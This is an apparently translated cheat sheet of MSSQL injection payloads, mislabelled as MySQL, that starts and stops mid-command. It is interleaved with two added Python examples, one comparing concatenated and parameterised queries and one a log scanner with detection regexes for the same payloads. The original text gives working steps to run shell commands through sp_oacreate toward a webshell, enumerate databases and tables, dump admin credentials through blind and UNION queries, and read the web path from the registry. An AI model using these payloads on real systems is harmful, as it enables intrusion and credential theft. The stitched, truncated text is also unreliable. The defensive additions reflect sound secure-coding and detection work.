
Common SQL injection statements explained (2)_MySQL

Date: 2021-07-01 10:21:17 | Helped 24 readers

bitsCN.com

  w "默认Web站点" -v "e","e:/"'--

  Access attributes (used together with writing a webshell):

  declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse'

  Special trick for dumping the database name: %5c = '\' (submit the path with \ or / replaced by %5c).

  How to get the names of all tables in a given SQL Server database?

  --------------------------------------------------------------------------------

  User tables:

  select name from sysobjects where xtype = 'U';

  System tables:

  select name from sysobjects where xtype = 'S';

  All tables:

  select name from sysobjects where xtype = 'S' or xtype = 'U';

  --------------------------------------------------------------------------------

  and 0<>(select top 1 paths from newtable)--

  Get the database names (dbid 1 to 5 are system databases; only 6 and above need checking):

  and 1=(select name from master.dbo.sysdatabases where dbid=7)--

  and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

  Submit dbid = 7, 8, 9, ... in turn to get more database names.

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')    dumps one table name;
  assume it is admin

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin'))    to get the other tables.

  and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))    dumps the UID value; assume it is 18779569 (uid=id)

  and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)
  gets one column of admin; assume it is user_id

  and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))    to dump the other columns

  and 0<(select user_id from BBS.dbo.admin where username>1)    gets the username
  The password can be obtained the same way... assuming columns such as user_id, username and password exist.

  and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')    gets the table name

  and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))

  and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))    determines the id value

  and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)    all columns

  ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

  ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

  (union also works well against Access)

  Get the web path
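The `?id=-1 union select ...` lines above only work because the value of `?id=` is pasted into the SQL statement as text. The following added example (not code from the original page) runs that same payload shape against a toy in-memory SQLite database, once through string concatenation and once through a bound parameter, so the difference is visible in the returned rows. The table and column names and the rows are constructed for the example.

```python
"""Added example: the page's ``?id=-1 union select ...`` payload against a
concatenated query versus a parameterised one. Table names, columns and rows
are all constructed for this demonstration."""
import sqlite3

# Same shape as the page's payload, three columns to match the products query.
PAYLOAD = "-1 union select id, username, password from admin"


def make_db() -> sqlite3.Connection:
    """Build an in-memory database: a products table the page would reach via
    ?id= and an admin table holding the rows an attacker is after (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99'), (2, 'gadget', '19.99');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'hunter2');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """Builds the statement by concatenation: whatever arrives in ?id= becomes
    part of the SQL, so a UNION appended by the client is executed as SQL."""
    sql = "SELECT id, name, price FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, id_param: str) -> list:
    """Binds ?id= as a value: the whole payload string is compared against the
    integer column as data and never parsed as SQL, so no admin rows come back."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def lookup_hardened(conn: sqlite3.Connection, id_param: str) -> list:
    """Defence in depth: reject anything that is not an integer before it gets
    near the database, then bind the parsed value."""
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_vulnerable(db, PAYLOAD))    # leaks the admin row
    print("parameterised:", lookup_parameterised(db, PAYLOAD))  # []
    print("hardened, id=2:", lookup_hardened(db, "2"))
```

The concatenated version returns the admin row because the database sees `... WHERE id = -1 union select id, username, password from admin` as one statement; the bound version sees a single string value and returns nothing. The integer check in `lookup_hardened` is the extra layer that also stops the `and 0<>(select ...)` blind probes earlier on this page, since none of them are valid integers.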
  ;create table [dbo].[swap] ([swappass][char](255));--

  and (select top 1 swappass from swap)=1--

  ;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into p
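Every payload family on this page (catalog enumeration through sysobjects/syscolumns/sysdatabases, the sp_oacreate/xp_regread stored procedures, UNION SELECT, stacked statements after `;`, and the %5c path trick) leaves a recognisable trace in the web server's request log. The following added example (not from the original page) is a small rule-based scanner that decodes each request line once and reports which families it matches. The log lines, IP addresses and rule names are constructed for the example.

```python
"""Added example: detection rules for the injection patterns listed on this
page, run over constructed web-server log lines."""
import re
from urllib.parse import unquote_plus

# Each rule pairs a constructed rule name with a pattern mirroring one payload
# family from the page. Patterns are checked on both the raw and the
# URL-decoded request so encoded and plain forms are both caught.
RULES = [
    ("mssql_catalog_enum", re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b", re.I)),
    ("mssql_xproc", re.compile(r"\b(xp_regread|sp_oacreate|sp_oamethod)\b", re.I)),
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("stacked_query", re.compile(r";\s*(?:create|drop|insert|declare|exec)\b", re.I)),
    ("backslash_path_probe", re.compile(r"%5c", re.I)),
]

# Pull the request target out of a common-log-format line; fall back to the
# whole line if the format is different.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

# Constructed sample log lines (common log format, not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [01/Jul/2021:10:21:17 +0800] "GET /news.asp?id=7 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jul/2021:10:21:18 +0800] "GET /news.asp?id=7%20and%200%3C%3E(select%20top%201%20name%20from%20bbs.dbo.sysobjects%20where%20xtype%3D%27U%27) HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jul/2021:10:21:19 +0800] "GET /news.asp?id=-1%20union%20select%201,2,3,*%20from%20admin HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jul/2021:10:21:20 +0800] "GET /news.asp?id=7;create%20table%20[dbo].[swap]%20([swappass][char](255));-- HTTP/1.1" 500 312',
    '10.0.0.9 - - [01/Jul/2021:10:21:21 +0800] "GET /news%5cdb%5cbbs.mdb HTTP/1.1" 500 280',
    '10.0.0.9 - - [01/Jul/2021:10:21:22 +0800] "GET /news.asp?id=7;declare%20@o%20int%20exec%20sp_oacreate%20%27wscript.shell%27,@o%20out HTTP/1.1" 500 312',
]


def scan_line(line: str) -> list:
    """Return the names of all rules that match this log line, in RULES order."""
    match = REQUEST_RE.search(line)
    raw = match.group(1) if match else line
    decoded = unquote_plus(raw)  # single decode pass; %5c is still matched on raw
    hits = []
    for name, pattern in RULES:
        if pattern.search(raw) or pattern.search(decoded):
            hits.append(name)
    return hits


def scan_log(lines) -> list:
    """Return (line_number, [rule names]) for every line that matched at least one rule."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_log(LOG_LINES):
        print(f"line {number}: {', '.join(hits)}")
```

Line 1 is the only clean request; the rest each trigger one or two rules. Decoding once is deliberate: the page's `%5c` trick depends on the raw encoded byte reaching the server, so that rule is matched against the undecoded request, while the SQL keywords are matched after decoding so that `%20` and `%27` cannot hide them. In production these rules belong in the WAF or SIEM pipeline, with the 500 status codes on the matching lines as a second signal that the probes are hitting an error-returning query.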

